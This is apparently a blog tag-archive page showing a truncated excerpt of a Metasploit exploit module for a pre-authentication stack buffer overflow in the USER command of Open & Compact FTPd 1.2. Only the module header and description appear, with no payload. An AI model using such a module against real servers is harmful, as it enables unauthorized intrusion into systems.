Tag Archives: Linux

Unauthenticated buffer overflow exploit

require ‘msf/core’ class Metasploit3 < Msf::Exploit::Remote     Rank = AverageRanking     include Msf::Exploit::Remote::Ftp     def initialize(info = {})         super(update_info(info,             ‘Name’           => ‘Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow’,             ‘Description’    => %q{                 This module exploits a stack overflow in the USER verb in Open & Compact FTPd version 1.2. The program will crash once the payload is sent, […]

Posted in applications, security | Also tagged | Comments closed